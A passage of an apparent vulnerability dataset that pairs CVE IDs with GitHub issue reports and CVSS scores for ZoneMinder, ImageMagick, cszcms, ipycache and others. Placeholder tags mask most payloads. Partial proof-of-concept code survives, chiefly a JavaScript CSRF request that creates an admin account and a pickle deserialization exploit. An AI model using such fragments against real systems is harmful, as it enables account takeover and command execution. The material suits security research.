  43876. },
  43877. {
  43878. "CVE_ID": "CVE-2019-7340",
  43879. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2462",
  43880. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2462",
  43881. "Repo_new": "zoneminder/zoneminder",
  43882. "Issue_Created_At": "2019-01-24T20:39:09Z",
  43883. "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the APITAG parameter value, without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43884. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43885. "severity": "MEDIUM",
  43886. "baseScore": 6.1,
  43887. "impactScore": 2.7,
  43888. "exploitabilityScore": 2.8
  43889. },
  43890. {
  43891. "CVE_ID": "CVE-2019-7341",
  43892. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2463",
  43893. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2463",
  43894. "Repo_new": "zoneminder/zoneminder",
  43895. "Issue_Created_At": "2019-01-24T20:50:25Z",
  43896. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43898. "severity": "MEDIUM",
  43899. "baseScore": 6.1,
  43900. "impactScore": 2.7,
  43901. "exploitabilityScore": 2.8
  43902. },
  43903. {
  43904. "CVE_ID": "CVE-2019-7342",
  43905. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2461",
  43906. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2461",
  43907. "Repo_new": "zoneminder/zoneminder",
  43908. "Issue_Created_At": "2019-01-24T20:33:09Z",
  43909. "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the APITAG parameter value, without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG POST Data CODETAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43910. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43911. "severity": "MEDIUM",
  43912. "baseScore": 6.1,
  43913. "impactScore": 2.7,
  43914. "exploitabilityScore": 2.8
  43915. },
  43916. {
  43917. "CVE_ID": "CVE-2019-7343",
  43918. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2464",
  43919. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2464",
  43920. "Repo_new": "zoneminder/zoneminder",
  43921. "Issue_Created_At": "2019-01-24T20:55:16Z",
  43922. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43923. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43924. "severity": "MEDIUM",
  43925. "baseScore": 6.1,
  43926. "impactScore": 2.7,
  43927. "exploitabilityScore": 2.8
  43928. },
  43929. {
  43930. "CVE_ID": "CVE-2019-7344",
  43931. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2455",
  43932. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2455",
  43933. "Repo_new": "zoneminder/zoneminder",
  43934. "Issue_Created_At": "2019-01-24T19:59:50Z",
  43935. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the Filter name , without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG \"> APITAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43936. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43937. "severity": "MEDIUM",
  43938. "baseScore": 6.1,
  43939. "impactScore": 2.7,
  43940. "exploitabilityScore": 2.8
  43941. },
  43942. {
  43943. "CVE_ID": "CVE-2019-7345",
  43944. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2468",
  43945. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2468",
  43946. "Repo_new": "zoneminder/zoneminder",
  43947. "Issue_Created_At": "2019-01-24T21:25:49Z",
  43948. "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view options , does no input validation to the value supplied to APITAG , APITAG , APITAG , APITAG field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, APITAG , APITAG , APITAG , APITAG will beset with the Payload & get triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43949. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43950. "severity": "MEDIUM",
  43951. "baseScore": 4.8,
  43952. "impactScore": 2.7,
  43953. "exploitabilityScore": 1.7
  43954. },
  43955. {
  43956. "CVE_ID": "CVE-2019-7346",
  43957. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2469",
  43958. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2469",
  43959. "Repo_new": "zoneminder/zoneminder",
  43960. "Issue_Created_At": "2019-01-24T21:36:28Z",
  43961. "description": "Weak Cross site Resource Forgery(CSRF) Protection . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Try again button in callback function Whenever a CSRF check fails,a callback function is called displaying a fail message. Unfortunately there also exists an APITAG again\" button on the page, which allows to resend the failed request, making the attack successful. To Reproduce APITAG Expected behavior This allows an attacker to easily carry out the CSRF attack. Normally users are not too technical to understand what CSRF failure message is & would generally click on APITAG Again\", themselves making the attack successful. Debug Logs None",
  43962. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43963. "severity": "HIGH",
  43964. "baseScore": 8.8,
  43965. "impactScore": 5.9,
  43966. "exploitabilityScore": 2.8
  43967. },
  43968. {
  43969. "CVE_ID": "CVE-2019-7347",
  43970. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2476",
  43971. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2476",
  43972. "Repo_new": "zoneminder/zoneminder",
  43973. "Issue_Created_At": "2019-01-25T03:01:24Z",
  43974. "description": "Time of check Time of use (TOCTOU) Race Condition . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Time of check, time of use race conditions occur when a resource is checked for a particular value, that value is changed, then the resource is used, based on the assumption that the value is still the same as it was at check time. To Reproduce The session is active for authenticated user, even after deleted from users table, leading to Time of check Time of use (TOCTOU) Race Condition. This can allow an non existing user to access & modify accessible records APITAG APITAG etc). Affected URL : FILETAG APITAG access) Navigate to users page and APITAG New User\" from users tab and assign any privileges. Delete the newly added user. Deleted user can still access the interface & make modifications to the allowed operations. An attacker can gain access to otherwise unauthorized resources and modify, delted or update application data. APITAG APITAG APITAG Expected behavior Destroy the user's session, once the users record is deleted from the database. Debug Logs None",
  43975. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  43976. "severity": "HIGH",
  43977. "baseScore": 7.5,
  43978. "impactScore": 5.9,
  43979. "exploitabilityScore": 1.6
  43980. },
  43981. {
  43982. "CVE_ID": "CVE-2019-7348",
  43983. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2467",
  43984. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2467",
  43985. "Repo_new": "zoneminder/zoneminder",
  43986. "Issue_Created_At": "2019-01-24T21:19:53Z",
  43987. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view user , does no input validation to the value supplied to username field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, APITAG , APITAG , APITAG , APITAG will be set with the Payload & get triggered APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43988. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43989. "severity": "MEDIUM",
  43990. "baseScore": 6.1,
  43991. "impactScore": 2.7,
  43992. "exploitabilityScore": 2.8
  43993. },
  43994. {
  43995. "CVE_ID": "CVE-2019-7349",
  43996. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2465",
  43997. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2465",
  43998. "Repo_new": "zoneminder/zoneminder",
  43999. "Issue_Created_At": "2019-01-24T20:59:00Z",
  44000. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  44001. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44002. "severity": "MEDIUM",
  44003. "baseScore": 6.1,
  44004. "impactScore": 2.7,
  44005. "exploitabilityScore": 2.8
  44006. },
  44007. {
  44008. "CVE_ID": "CVE-2019-7350",
  44009. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2471",
  44010. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2471",
  44011. "Repo_new": "zoneminder/zoneminder",
  44012. "Issue_Created_At": "2019-01-24T21:49:38Z",
  44013. "description": "Improper Session Management Session Fixation. Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Before any response being rendered on the web page, a cookie is being set as part of response via Set Cookie APITAG due to improper implementation, multiple cookies NUMBERTAG are being set when a user successfully logs in, which isn't an expected APITAG when the next user logs into the application using the same browser, the last user's last cookie is being set as the present user's first cookie. To Reproduce Login into the application, capture the response APITAG HTTP header addon for firefox) Multiple Set Cookie headers will be present in the response Exploitation Actors User A APITAG User B APITAG NUMBERTAG User B logs into the application, captures his own Cookies & logs out. User B's cookie : Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG APITAG NUMBERTAG User A Uses the same browser & log into the application. User A's cookie Set Cookie: APITAG path=/; APITAG APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG NUMBERTAG User B uses User A's Last cookie to hijack the User B's session (locally/remotely) Expected behavior Only set single cookie the user & invalidate the same once user logs out of the application. Debug Logs None",
  44014. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
  44015. "severity": "HIGH",
  44016. "baseScore": 7.3,
  44017. "impactScore": 5.2,
  44018. "exploitabilityScore": 2.1
  44019. },
  44020. {
  44021. "CVE_ID": "CVE-2019-7351",
  44022. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2466",
  44023. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2466",
  44024. "Repo_new": "zoneminder/zoneminder",
  44025. "Issue_Created_At": "2019-01-24T21:05:23Z",
  44026. "description": "Log Injection. Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non repudiation and incident forensics capability Most components of APITAG can emit informational, warning, error and debug messages in a standard format. These messages can be logged in.. Example of these messages is: APITAG The first part refers to the date and time of the entry, the next section is the name (or an abbreviated version) of the script, followed by the process id in square brackets, a severity code (INF, WAR, ERR or DBG) and the debug text. All the mentioned information can be manipulated & inject by an attacker by enticing the victim to visit a specially crafted link, which in turn will inject a custom Log message provided by the attacker. The same will be reflected in the Log view page To Reproduce Affected URL : FILETAG POST Data CODETAG Navigate to the Affected URL, Custom Log will be injected. Navigate to the URLTAG Log will be visible. APITAG Expected behavior Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data. Debug Logs None",
  44027. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  44028. "severity": "MEDIUM",
  44029. "baseScore": 6.5,
  44030. "impactScore": 3.6,
  44031. "exploitabilityScore": 2.8
  44032. },
  44033. {
  44034. "CVE_ID": "CVE-2019-7352",
  44035. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2475",
  44036. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2475",
  44037. "Repo_new": "zoneminder/zoneminder",
  44038. "Issue_Created_At": "2019-01-24T22:15:13Z",
  44039. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view Run State , does no input validation to the value supplied to New State field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data APITAG Payload used APITAG Navigate to the Affected URL and set value of New State with payload Click on Download and Payload would be triggered. APITAG APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  44040. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44041. "severity": "MEDIUM",
  44042. "baseScore": 6.1,
  44043. "impactScore": 2.7,
  44044. "exploitabilityScore": 2.8
  44045. },
  44046. {
  44047. "CVE_ID": "CVE-2019-7395",
  44048. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1451",
  44049. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1451",
  44050. "Repo_new": "imagemagick/imagemagick",
  44051. "Issue_Created_At": "2019-01-17T03:11:55Z",
  44052. "description": "memory leak in APITAG in coders/psd.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/psd.c Steps to Reproduce APITAG quality NUMBERTAG image_info >quality APITAG quality; if APITAG != Z_OK) //line NUMBERTAG APITAG return NUMBERTAG line NUMBERTAG ERRORTAG c if APITAG != Z_OK) //line NUMBERTAG APITAG + compressed_pixels=(unsigned char ) APITAG + compressed_pixels); return NUMBERTAG System Configuration APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  44053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44054. "severity": "HIGH",
  44055. "baseScore": 7.5,
  44056. "impactScore": 3.6,
  44057. "exploitabilityScore": 3.9
  44058. },
  44059. {
  44060. "CVE_ID": "CVE-2019-7396",
  44061. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1452",
  44062. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1452",
  44063. "Repo_new": "imagemagick/imagemagick",
  44064. "Issue_Created_At": "2019-01-17T04:06:51Z",
  44065. "description": "Potential Memory Leak in APITAG in coders/sixel.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG potential memory leak in APITAG in sixel.c Steps to Reproduce APITAG max_x || imsy > max_y) { // line NUMBERTAG dmsx = max_x; dmsy = max_y; if APITAG == APITAG { imbuf = (unsigned char ) APITAG return APITAG } if ((dmbuf = (unsigned char ) APITAG , dmsy)) == NULL) { //line NUMBERTAG imbuf = (unsigned char ) APITAG return APITAG } for (y NUMBERTAG y APITAG columns,&image >rows,&sixel_palette,&image >colors,exception) == APITAG // line NUMBERTAG sixel_buffer=(char ) APITAG ERRORTAG } sixel_buffer=(char ) APITAG image >depth NUMBERTAG image APITAG APITAG >columns,image >rows,exception); if (status == APITAG { sixel_pixels=(unsigned char ) APITAG // line NUMBERTAG sixel_palette=(unsigned char ) APITAG APITAG } ERRORTAG c if (sixel_decode(image,(unsigned char ) APITAG >columns,&image >rows,&sixel_palette,&image >colors,exception) == APITAG { sixel_buffer=(char ) APITAG + sixel_pixels=(unsigned char ) APITAG ERRORTAG } ` System Configuration APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  44066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44067. "severity": "HIGH",
  44068. "baseScore": 7.5,
  44069. "impactScore": 3.6,
  44070. "exploitabilityScore": 3.9
  44071. },
  44072. {
  44073. "CVE_ID": "CVE-2019-7397",
  44074. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1454",
  44075. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1454",
  44076. "Repo_new": "imagemagick/imagemagick",
  44077. "Issue_Created_At": "2019-01-17T11:10:56Z",
  44078. "description": "Potential Memory Leak in APITAG in coders/pdf.c different from NUMBERTAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Potential memory leak in function APITAG in coders/pdf.c, which is similar to but different from NUMBERTAG Steps to Reproduce APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG S Code Additional information: code review APITAG Credit to Bingchang Liu of VARAS of IIE",
  44079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44080. "severity": "HIGH",
  44081. "baseScore": 7.5,
  44082. "impactScore": 3.6,
  44083. "exploitabilityScore": 3.9
  44084. },
  44085. {
  44086. "CVE_ID": "CVE-2019-7398",
  44087. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1453",
  44088. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1453",
  44089. "Repo_new": "imagemagick/imagemagick",
  44090. "Issue_Created_At": "2019-01-17T06:50:47Z",
  44091. "description": "Potential Memory Leak in APITAG in coders/dib.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/dib.c Steps to Reproduce APITAG compression != APITAG //line NUMBERTAG size_t length; / Convert run length encoded raster pixels. / length NUMBERTAG UL (bytes_per_line NUMBERTAG UL NUMBERTAG UL; dib_data=(unsigned char ) APITAG // line NUMBERTAG image >rows NUMBERTAG UL) sizeof( dib_data)); if (dib_data == (unsigned char ) NULL) { pixels=(unsigned char ) APITAG ERRORTAG } APITAG int) APITAG pixels,dib_data); pixels=(unsigned char ) APITAG pixels=dib_data; // line NUMBERTAG APITAG = BI_RLE8; } APITAG c if (image >storage_class == APITAG //line NUMBERTAG if APITAG APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  44092. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44093. "severity": "HIGH",
  44094. "baseScore": 7.5,
  44095. "impactScore": 3.6,
  44096. "exploitabilityScore": 3.9
  44097. },
  44098. {
  44099. "CVE_ID": "CVE-2019-7402",
  44100. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/8",
  44101. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/8",
  44102. "Repo_new": "panghusec/exploit",
  44103. "Issue_Created_At": "2019-02-05T12:38:18Z",
  44104. "description": "Home Storage XSS base on csrf. Attackers can get any user's access credentials and do otherthing APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it APITAG source code FILETAG Did not do any filtering Causing storage xss and CSRF exists at the change QQ number ]( URLTAG APITAG csrf poc. Phishing admin accessing malicious pages ERRORTAG NUMBERTAG Then go back to the home page ![ URLTAG",
  44105. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44106. "severity": "MEDIUM",
  44107. "baseScore": 6.1,
  44108. "impactScore": 2.7,
  44109. "exploitabilityScore": 2.8
  44110. },
  44111. {
  44112. "CVE_ID": "CVE-2019-7403",
  44113. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/9",
  44114. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/9",
  44115. "Repo_new": "panghusec/exploit",
  44116. "Issue_Created_At": "2019-02-05T12:42:54Z",
  44117. "description": "Arbitrary File Delete Vulnerability. Attackers can Delete any file on the system APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin APITAG is a bbb folder under the c drive ]( URLTAG APITAG the URL in the browser FILETAG NUMBERTAG success ![ URLTAG APITAG URLTAG",
  44118. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  44119. "severity": "MEDIUM",
  44120. "baseScore": 4.9,
  44121. "impactScore": 3.6,
  44122. "exploitabilityScore": 1.2
  44123. },
  44124. {
  44125. "CVE_ID": "CVE-2019-7537",
  44126. "Issue_Url_old": "https://github.com/pytroll/donfig/issues/5",
  44127. "Issue_Url_new": "https://github.com/pytroll/donfig/issues/5",
  44128. "Repo_new": "pytroll/donfig",
  44129. "Issue_Created_At": "2019-02-11T02:33:17Z",
  44130. "description": "APITAG method is vulnerable. coding=utf NUMBERTAG import APITAG as test APITAG PATHTAG APITAG Hi, there is a vulnerability in collect_yaml(paths) method in APITAG please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  44131. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44132. "severity": "CRITICAL",
  44133. "baseScore": 9.8,
  44134. "impactScore": 5.9,
  44135. "exploitabilityScore": 3.9
  44136. },
  44137. {
  44138. "CVE_ID": "CVE-2019-7539",
  44139. "Issue_Url_old": "https://github.com/rossant/ipycache/issues/47",
  44140. "Issue_Url_new": "https://github.com/rossant/ipycache/issues/47",
  44141. "Repo_new": "rossant/ipycache",
  44142. "Issue_Created_At": "2019-02-11T05:43:32Z",
  44143. "description": "APITAG method is vulnerable. import os import pickle import ipycache class Test(object): def __init__(self): self.a NUMBERTAG def __reduce__(self): return APITAG tmpdaa = APITAG with open(\"a APITAG as f: APITAG APITAG APITAG APITAG function with evil data will cause command execution,if attack share evil data on internet, when user load it , it will cause command execution.",
  44144. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44145. "severity": "HIGH",
  44146. "baseScore": 8.8,
  44147. "impactScore": 5.9,
  44148. "exploitabilityScore": 2.8
  44149. },
  44150. {
  44151. "CVE_ID": "CVE-2019-7559",
  44152. "Issue_Url_old": "https://github.com/Boolector/boolector/issues/30",
  44153. "Issue_Url_new": "https://github.com/boolector/boolector/issues/30",
  44154. "Repo_new": "boolector/boolector",
  44155. "Issue_Created_At": "2019-01-15T17:48:48Z",
  44156. "description": "Out of Bounds write in pusht_bfr. While fuzzing boolector, APITAG APITAG this input file APITAG APITAG APITAG was found, which leads to an out of bounds write, according to valgrind. The attached file contains more lines leading to the same crash, the above file contains the minimal version. FILETAG FILETAG FILETAG APITAG APITAG ASAN trace (probably not useful, since it does not find the write) APITAG ERRORTAG APITAG APITAG APITAG Valgrind trace APITAG ERRORTAG APITAG Used version APITAG Steps to reproduce APITAG",
  44157. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44158. "severity": "MEDIUM",
  44159. "baseScore": 5.5,
  44160. "impactScore": 3.6,
  44161. "exploitabilityScore": 1.8
  44162. },
  44163. {
  44164. "CVE_ID": "CVE-2019-7560",
  44165. "Issue_Url_old": "https://github.com/Boolector/boolector/issues/28",
  44166. "Issue_Url_new": "https://github.com/boolector/boolector/issues/28",
  44167. "Repo_new": "boolector/boolector",
  44168. "Issue_Created_At": "2019-01-15T17:10:27Z",
  44169. "description": "Use After Free in btor_delete. While fuzzing boolector, APITAG APITAG this input file APITAG ERRORTAG APITAG was found, which leads to a use after free in btor_delete. The attached file contains more lines leading to the same crash, the above file contains the minimal version. FILETAG FILETAG FILETAG APITAG APITAG ASAN trace APITAG ERRORTAG APITAG APITAG APITAG trace APITAG ERRORTAG APITAG Used version APITAG Steps to reproduce APITAG",
  44170. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44171. "severity": "MEDIUM",
  44172. "baseScore": 5.5,
  44173. "impactScore": 3.6,
  44174. "exploitabilityScore": 1.8
  44175. },
  44176. {
  44177. "CVE_ID": "CVE-2019-7566",
  44178. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/17",
  44179. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/17",
  44180. "Repo_new": "cskaza/cszcms",
  44181. "Issue_Created_At": "2019-01-17T02:13:39Z",
  44182. "description": "There is one CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a administrator APITAG APITAG APITAG APITAG '', '/') APITAG APITAG function APITAG { var xhr = new APITAG APITAG PATHTAG true); APITAG Type\", \"multipart\\/form data; boundary= APITAG APITAG PATHTAG \\/ ; APITAG APITAG Language\", \"zh CN,zh; APITAG APITAG = true; var body = \" APITAG \" + APITAG Disposition: form data; name= csrf_csz \" + \" \" + APITAG \" + \" APITAG \" + APITAG Disposition: form data; name= name \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= email \" + \" \" + \" EMAILTAG \" + \" APITAG \" + APITAG Disposition: form data; name= password \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= con_password \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= group NUMBERTAG APITAG \" + APITAG Disposition: form data; name= active NUMBERTAG APITAG \" + APITAG Disposition: form data; name= first_name \" + \" \" + \"te \" + \" APITAG \" + APITAG Disposition: form data; name= last_name \" + \" \" + \"st \" + \" APITAG \" + APITAG Disposition: form data; name= year NUMBERTAG APITAG \" + APITAG Disposition: form data; name= month NUMBERTAG APITAG \" + APITAG Disposition: form data; name= day NUMBERTAG APITAG \" + APITAG Disposition: form data; name= gender \" + \" \" + \"male \" + \" APITAG \" + APITAG Disposition: form data; name= address NUMBERTAG APITAG \" + APITAG Disposition: form data; name= phone NUMBERTAG APITAG \" + APITAG Disposition: form data; name= file_upload ; filename= \" + APITAG Type: application/octet stream \" + \" \" + \" \" + \" APITAG \" + APITAG Disposition: form data; name= submit \" + \" \" + APITAG \" + \" APITAG \"; var APITAG = new APITAG for (var i NUMBERTAG i APITAG APITAG APITAG APITAG APITAG APITAG",
  44183. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44184. "severity": "HIGH",
  44185. "baseScore": 8.8,
  44186. "impactScore": 5.9,
  44187. "exploitabilityScore": 2.8
  44188. },
  44189. {
  44190. "CVE_ID": "CVE-2019-7567",
  44191. "Issue_Url_old": "https://github.com/caokang/waimai/issues/10",
  44192. "Issue_Url_new": "https://github.com/caokang/waimai/issues/10",
  44193. "Repo_new": "caokang/waimai",
  44194. "Issue_Created_At": "2019-01-07T05:48:22Z",
